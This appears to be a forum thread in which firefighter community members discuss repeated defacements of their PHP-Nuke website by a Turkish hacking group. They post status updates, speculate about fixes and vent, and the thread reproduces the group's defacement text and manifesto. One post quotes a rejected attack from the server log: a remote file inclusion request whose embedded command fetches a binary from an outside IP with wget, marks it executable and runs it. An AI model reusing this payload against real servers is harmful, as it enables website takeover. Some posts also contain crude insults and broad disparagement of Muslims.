For the third time in two weeks, some fracking hackers have hacked into the IACOJ website. :mad

Who wants to go to Turkey and hunt these mutts down with me? ;)

Im in Cap. Lets go hunting!!!!!

Lets get em!!


RR

What is it going to take to end this crap?

I'm in!
Are they just arbitrarily picking the IACOJ site or are they targeting it for a particular reason?

Almost certainly it's just random.

They're almost certainly using some scanning software looking for sites with vulnerable versions of PHP Nuke. Good chance the hack itself is fully automated.

I would *think* the version of PHP Nuke and patching it would be the responsibility of the company that hosts IACOJ.

or is it a consortium of firehouse.com users who's IACOJ membership was denied? :eek:

an attack from our own (FF's)? :eek: :eek:

(images of TH, Cdevoe, etc sitting in a dark cellar running through my mind) :rolleyes:

I told you trojan horse would get his revenge :p

Hey Cap,

I have 19 other Recon members that have not much to at drill this weekend want us to pull an op?

Hey Cap,

I have 19 other Recon members that have not much to at drill this weekend want us to pull an op?


I'll provide the food.

I told you trojan horse would get his revenge :p

Well, since he is a 1% er, Im sure he could figure out how to do it. :rolleyes:

I told you trojan horse would get his revenge :p

I always assumed he was a virus anyways....remember the trojanhorse virus a few years ago...maybe he really is a hacker in disguise.

A sample of our Internet site log file. A PHP attach recorded and rejected

from IP Address 80.55.45.106
on Port 80

GET /index2.php option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113 .25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo| 401 Mozilla/4.0+(compatible;+MSIE+6.0;+Win dows+NT+5.1;)

The first IP address the attack was from is out of Poland.

The URL http://213.97.113.25/cmd.gif is from Spain, Don't try it it is BS.

The object is to use a vulnerability in PHP to gain access as an Admin user to any PHP site.

Hackers set up to send a series of commands to any IP address they can PING a response from, once the appropriate responses to an attack are recieved and recorded, they can go back to the sites and "take over".

As a security engineer with experience patching and keeping phpbb sites secure, I'd be happy to help you guys out if you need it. Just shoot me a PM on here.

Sorry guys...it was me. I was just trying to get some money out of my ATM and hit the wrong PIN.

It shouldnt happen again...Bou

SHENANIGANS !!!!



Oh crud, I forgot my torch. :mad:

rubber strikes again..

Sorry guys, its gotta be hurting your daily hits, to be honest I haven't visited since the last hijack

They don't have to hack.
They need to fill out an application.
If they want to get in that bad.
Do hackers get hacked?
CR

Only when we catch them.

For the third time in two weeks, some fracking hackers have hacked into the IACOJ website. :mad

Who wants to go to Turkey and hunt these mutts down with me? ;)

I worked many years in the hosting and web design business - still do part time.

I would either:

a: get a new hosting provider(providing they are the weak area)

b: ask your hosting comany to install all the latest security patches

c: see if PHPnuker has a patch or fix

d: ditch PHP nuke

Dreamweaver has a template feature that works great. This allows you to make changes to mutiple pages over over the entire site.

Was it the "Turkish Hacker's Group"?

They screwed up my (RMES's) site last month.

Took me about 90 minutes to fix ... make sure you search EVERY directory/folder on your webserver for index pages. If it has an index.* it gets eaten. Every directory also gets a trio of files containing the same HTML code - I forget exactly what its name is, but I think it's "avb" (.htm, .php, etc).

RMES's website runs a message board using phpBB2. I don't know if that was the root of the problem, but my hosting provider (ReadyHosting) says it was a fault on their end and has been fixed.

Haven't seen the Turks again/since.

Was it the "Turkish Hacker's Group"?

As a matter of fact, it was.

hfd66truck and Steamer take care of the site, if I tried, I would probably shut down the entire internet. :p

I think it is pathetic how some people get off on being jerks.

I think it is pathetic how some people get off on being jerks.

Atleast this time, it's a smple fix... Just deleting a news entry, renaming one forum section, and that should be it.

*expletive removed, expletive removed*

Charades ... First word starts with F and ends in G, second word starts with P and rhymes with tricks. Jerks!

:mad:

*expletive removed, expletive removed*

Charades ... First word starts with F and ends in G, second word starts with P and rhymes with tricks. Jerks!

:mad:
Now, Now, careful, you dont want to get banned! ;)

I will admit it is getting pretty annoying though.

Now, Now, careful, you dont want to get banned! ;)

I will admit it is getting pretty annoying though.

Shhhhhhhhhhh ;) :p

Another community that I belong to got hacked the previous week, it was the 3rd-4th time and this time the hacker deleted everything. Since its a small community there was no backup, all our membership info and content (including the forums) was lost. Each attack came from a different source, different messages left. It was not a password hack, it was some sort of back door attack to get in. We asked our host for help after the 2nd attack, they promised it wouldn't happen again.

We ended up moving the site to GoDaddy.com (gotta love their commercials), bigger host has more to loose if their security is not up to snuff. Attacks have stopped so far.

I see that the Mutt's are back eh? Was it the same group as last time?

The problem isn't with the host's security. It's with the PHP Nuke package we're using. There are some other security patches that I'm looking at, but in the words of U2, I still haven't found what I'm looking for.

BTW...I've asked the host to restore the site from a backup. It should be back up within the next few hours.

Obviously, word has spread that we are "easy".
Too bad that there isn't something like a virus that goes out when a hacker tries to get in. Maybe they would go away if their expensive equipment had a meltdown.
I wonder how they do it one handed?
CR

Whens it gonna be fixed? :mad:

It's back up and running.

I think we are in the process of being hacked again, I was just there and got a new "hacked by" screen. I PM'ed Steamer.

HACKED BY DAMAR WASH HERE





TURKİSH HACKERS


HacKeD By DamaR

OoOPSs DamaR Burdan Gecti...!!!



TeK LiDeR

85.255.80.10

Damarm@HotmaiL.Com



http://satanbat.sitemynet.com/





Thats what comes up when I went to the site....

You would think this A ~ H*le would be busy stealing identities or credit card numbers or cracking Citibank internet banking codes. F ing amateur! :mad: :mad: :mad:

If these idiots would put their time into something productive, they would be have the money to go buy women, instead of using their hands for this!!!

I checked the IP address and it comes out of Germany. They are working with us to find a potential redirect and cut the litlle bastards service. I believe our host has restricted public access, since it appears that we are on some kind of a hit list.

I'll post any updates here.

I checked the IP address and it comes out of Germany. They are working with us to find a potential redirect and cut the litlle bastards service. I believe our host has restricted public access, since it appears that we are on some kind of a hit list.

I'll post any updates here.
Does that mean I am public? I tried to access the site and got a "You are not authorized to view this page" Or is this a temporary thing until the fix is found?

*expletive removed, expletive removed*

Charades ... First word starts with F and ends in G, second word starts with P and rhymes with tricks. Jerks!

:mad:

Boy! YOU need a Hug........ :D :D

Does that mean I am public? I tried to access the site and got a "You are not authorized to view this page" Or is this a temporary thing until the fix is found?

They've actually blocked all IP's except mine so I can go through and patch any holes we've got. Considering we got nailed twice in two days, there's something there someplace. The trick is finding the holes.

Wasn't that supposed to be the beauty of Linux based vs Windows based? Easier to patch, less likely to be hacked, more secure, etc.

I feel a hunting trip coming on... :mad:

We just leaped from ridiculous to absurd.
We have a target on us.
Make the target go away.
I'll bet Jack Bauer could find them in less than 24 hours and exact his brand of justice unto them.
Mutts.
CR

I got the same thing too.. and damn it all to hell.. I'm the fracking Chairman of the Board! :D

For a minute there, I thought I was banned....

That was LAST time, Harve! LOL

But I'll never turn down a hug, I like hugs! :p :D

I could swear again though, stupid asswipes! I'm forced to take a 1/2 hr lunch break (rather leave earlier, but what can ya do?) and look forward to the chance to catch up on my email notifications. Instead, some German/Turkish/butthole hacker has finally shut us down GRRRRRRRRRRRRR :mad: :(

Guess I'll have to read FH instead :eek: hehehehehehehe ;)

I got the same thing too.. and damn it all to hell.. I'm the fracking Chairman of the Board! :D

For a minute there, I thought I was banned....

Wow, you'd have to do something REALLY NASTY to get booted off your own site :eek: :D :D :D :D

Is the IACOJ site completely down? I can't log on to it.

Will a 308 be sufficient, or do you want a 50 to reach out and tickle them from a distance?

IACOJ forever!!!!!!!!!!!!!!!!!!!!!

Wasn't that supposed to be the beauty of Linux based vs Windows based? Easier to patch, less likely to be hacked, more secure, etc.

It's not an Operating System level issue. It's not even PHP.

The problem rests in PHP-Nuke, which is a strange, buggy bird. Even their licensing system is screwy -- if you want the latest and greatest release, you have to pay a nominal fee ($10). Otherwise, you can download older ones for free...

Of course me thinks there isn't a lot of incentive by whoever maintains the master code to release many bug fixes for older versions...when you have to pay $10 for each "upgrade" to get it before the next release is ready.

The site's back up, but may be subject to occassional outages until some of the holes are patched.

I cant log in....Is that a "hole"?

I was on the site the other day and was looking at one of the topics in the forum that linked to another members site. When I clicked the link it stated that the site had been hacked. I sent a message to the administrator about the problem and where I thought the link was. I was just on there and it seems to be working now.

Here we go again

Apparently, the IACOJ website was hacked by some "turkey from Turkey" :mad:

I have to come to the conclusion that these hackers are just a bunch of fracking losers with no job, no girlfriend and no life whatsoever who masturbate while hacking someone elses hard work.

GOD D*** ALL THE FREAKING LOSERS!

Get a god da** life!

THis is the "manifesto" of the group that hacked the IACOJ website

Our Mission;

# All Members and Units of Cyber-Warrior TIM are considered to adopt in principle of all of this mission and its principles no subject to any conditon.

# Main Purpose and Object of TIM is, to put a stop or prevent any kind of web publications of sites that are against Islam, enemy of Islam, all kinds of Satanic and Pornographic Sites which might lead innocent brains into different directions.

# Any kind of publications and cases against Turkiye are covered by TIM’s principles.

# Any kind of technical support and help about security and similar issues will be provided by Cyber-Warrior TIM to those, who publishes their sites in the way that relates to Cyber-Warrior TIM Principles without any benefit.

# All of the clauses of Cyber-Warrior TIM Mission are considered to be made simple and clear. This is to say; none of the web-publications or sites ( such as any kind of religious sites or sites belonging to any foreign country ) are considered to be a Cyber-Warrior TIM TARGET unless they violate the rules stated above.

# Cyber Warrior TIM cannot be associated with or be related to any kind of political sentiments or ideology of any organization, party, association, foundation and body politic including its own users of different ideas and political sentiments.
TIM is only related to its Mission stated above.

# “Cyber Warrior TIM” Title cannot be used in any attacks without the approval of Administration or Superior Decision Mechanisms. “Cyber Warrior TIM” Title cannot be included in any individual attack as well even if it suitable for the mission either.

# Members are got admission and placed in the teams according to their expertise and are briefed according to their responsibilites and jobs.

# Group Administrators are free to choose their associates on their own and are held responsible for their team. .

# TIM Mission cannot be critized or judged by any individual, group or members under any circumstances. The Mission Rules can only be revised by Superior Administration and its Strategy Group if necessary.

# All TIM members are obliged to participate in Team Attacks/Actions. These Attacks/Actions are always planned and announced in advance by the Administration.

# It is strictly forbidden to leak or share any kind of information of any confidential and educational documents, files, programs, links, any kind of materials or tools that are under the property of Cyber Warrior , to any other platforms.

# Those, who have any kind of suspicious attempts or similar actions to leak into TIM - determined by CW Intelligence Group and Reports - are discharged and punished accordingly.



Cyber-Warrior TIM / Information Group

I guess we were targeted because we allow the occasional "F-word" and it's variations....

THis is the "manifesto" of the group that hacked the IACOJ website



I guess we were targeted because we allow the occasional "F-word" and it's variations....



You have got to be KIDDING ME!

What a bunch of bull!

(insert numerous expletives here!!!!!!!!!!!!!!!!!!!!!!!!)

FYI...the IACOJ site is back on line!

FYI...the IACOJ site is back on line!


Thanks Gonz....and whoever else contributed to getting 'er up and running again!

It wasn't me.. hell, I know squat about the programming. Credit goes to Steamer and hfd66Truck!

THis is the "manifesto" of the group that hacked the IACOJ website



I guess we were targeted because we allow the occasional "F-word" and it's variations....


Something to think about

And what the Fougasse do you mean by that?

Bggr. An F word.

Do a REAL search on the group concerned and you will find they are a Turkish based bunch of nobbers who seem to think that they can hijack the Internet for the purpose of extoling their own wacked out form of Islam.

They even have a commitee , sub commitee, sub-group structure (Damn, just like a terrorist cell would). And they and promote "Social Engineering" (read brainwashing) to achieve their goals.

These are some of the people that think Al Queida (bugger the spellink of it, it means "Wackers") are a nice bunch of blokes out for a sunday walk with everyones best interest at heart.

They are highly organised and focused, better than most small departments I read about on this site. And extremley dangerous.

Trust me on one thing that the media constantly screw up on.

"Hackers are scum". They are not "Geeks", they are not "Computer Nerds", and they sure as H3ll are not "Heroes".

These people promote the complete collapse of anything YOU recieve over the net including email, that does not praise THIER beliefs.

I am not sure about you, but here is why I joined the Military and the Fire Service.

"To serve the people of my country, REGARDLESS of their beliefs."

Simple really.

was just reading the problems u guys are having, and i hafta say i am not a member but this makes me sick. all the hard work you guys put in putting tradition and memories into the fire service and you get hacked by lowlifes because ur platform does not meet alli ackbar shariff dah's views is b/s i for one feel that anyone can belive what they want but when it starts encroaching on my (our) way of life then we have a big problem ....hang in there guys god bless u and all u do for (our) my brothers in the fire service

goes to a picture of a rose that is destroyed by a bullet.

I'm not a member, but my curiousity got the best of me and I went to the site after seeing Mike's comment. Stupid I know. Do these MUTTS do anything to your computer (viruses, etc) or just screw with the site?

I let Dave know right before Mike posted on here. He and Steve are working on it. I couldn't get on FH either all afternoon.

Tom - as far as I know they only F@@k with the site. I believe "they" usually just screw around with headers and stuff like that. I wondered about the virus thing this time around too.

I have Panda Platinum Internet Security and I did a complete scan of my hard drive. It didn't pick up anything. It was just updated today. Thanks for the info.

Let us know when it's fixed.

Let us know when it's fixed.
"Fixed" as in neutered? As in hackers?
I used to take it personally, but somehow I can't but think that they are a major pain in the arse for many websites.
Apparently, we are more "vulnerable".
Hopefully, that will be fixed in the near future.
I would hate to see all of the information that is on that site vaporized by a selfish little bastid who still lives at home and has a curfew.
CR

They basically only insert redirects into the software that send you to some other site. We're working on the problem right now, so hopefully, we'll be up and running soon.

Sites up for me......why is it that we are their favorite target! :mad: :mad: :mad: :mad: :mad:

Let em meet us face to face and we'll see whats screwed up afterwards, our site or...... :D ........sorry needed to vent


Smokey,

I scanned my computer as well and nothing was found. I pray that they do not decide to use viruses as we just got a new computer.

"Fixed" as in neutered? As in hackers?
I used to take it personally, but somehow I can't but think that they are a major pain in the arse for many websites.
Apparently, we are more "vulnerable".
Hopefully, that will be fixed in the near future.
I would hate to see all of the information that is on that site vaporized by a selfish little bastid who still lives at home and has a curfew.
CR
The Fire and Arson Forum at Forumworld has been hacked numerous times in the past couple of weeks in exactly the same fashion.

disregard last transmission...............was temporarily having problems with the site here.......must have been a fluke or something because 5 minutes later the site worked

Jeeze...I break into a panic whenever I see this thread raise it's ugly head. At least this time I'm not reading about people being sent to some extremist website to look at their manifesto. Whew!

Just an idle comment on the extent of Islamiscist crazoidism. They're pretty much everywhere.


And what the Fougasse do you mean by that?

Bggr. An F word.

Do a REAL search on the group concerned and you will find they are a Turkish based bunch of nobbers who seem to think that they can hijack the Internet for the purpose of extoling their own wacked out form of Islam.

They even have a commitee , sub commitee, sub-group structure (Damn, just like a terrorist cell would). And they and promote "Social Engineering" (read brainwashing) to achieve their goals.

These are some of the people that think Al Queida (bugger the spellink of it, it means "Wackers") are a nice bunch of blokes out for a sunday walk with everyones best interest at heart.

They are highly organised and focused, better than most small departments I read about on this site. And extremley dangerous.

Trust me on one thing that the media constantly screw up on.

"Hackers are scum". They are not "Geeks", they are not "Computer Nerds", and they sure as H3ll are not "Heroes".

These people promote the complete collapse of anything YOU recieve over the net including email, that does not praise THIER beliefs.

I am not sure about you, but here is why I joined the Military and the Fire Service.

"To serve the people of my country, REGARDLESS of their beliefs."

Simple really.

Jeeze...I break into a panic whenever I see this thread raise it's ugly head. At least this time I'm not reading about people being sent to some extremist website to look at their manifesto. Whew!

Sorry, Steve. We've been HIT AGAIN :mad:

Steve

email me Brother.

Lets do the change over.

Looks like it is more than a redirect hack. They changed the title on the home page to their own this time. They could only pull that off by editing the page code.

That's it; no more Jake and Vinnie until the hole is plugged.
My life's work is at the mercy of these mutts.
I wonder if they smoke a cigarette after they...
Ah; nevermind.
CR

Art - "don't let the bastards get you down."

That's why there are backup devices. I've got stuff that ain't even 1% as useful as what's on those boards. The mind of the hacker isn't far from that of the terrorist. Their joy is in disrupting things, and if we give in and let them keep us offline we let them win.

Too bad we don't know anyone that can return some of the medicine, kinda like the plumber's pipes always leak at home, I doubt their own web site is as secure as they think...

YIPPEEEE it's fixed!

Thank you, Steve!

Hacked again ? I cannot log in to the home page.

Im having the same problem.....

They're probably working on fixing or updating it.

I'm glad it wasn't just me.... :)

I'm having the same problem, get a login box.

After multiple hacks or attempted hacks in the last couple of days, I've locked up the site until we can get it updated. There are a few bugs to work out for the time being, but hopefully, I'll have it back up soon. I'm just getting really tired of dealing with these kiddie scripters hacking the site. I'm hoping to come up with a way to leave a little "present" for 'em.

Good Luck Steve :D Get'em Good

Steve

Am away from secure email at the mo.

ZIP up the .ini for php used on the site and send it to my normal email. We will check the settings etc when I am back tommorow.

Steve

Am away from secure email at the mo.

ZIP up the .ini for php used on the site and send it to my normal email. We will check the settings etc when I am back tommorow.

Call me crazy but I am geeting the feeling your security or lack of, is deeper than any PHP file that you set up on your domain.

Even if your using PHPnuke I cant imagine the script being that weak. I do not know the details of how your being hacked, however, I would want to know you host with so I dont recommend them.

Settle Petal

Hexcuse our higorance of the hintranet, wes jus a bunch of FarFarters tryin our bestest.

Hexcuse our higorance of the hintranet, wes jus a bunch of FarFarters tryin our bestest.


Well, thats all you had to say! Sheesh! :D















I wasnt trying to be confrontational - just maybe throwing out a suggestion for a fix.

WOOHOOO we're back online!

Good job, guys! :)

Settle Petal

Hexcuse our higorance of the hintranet, wes jus a bunch of FarFarters tryin our bestest.

Sounds like a fellow suthern boy

About as "suthern" as you get without wet feet. :D

And they are called "Blokes" down this here place.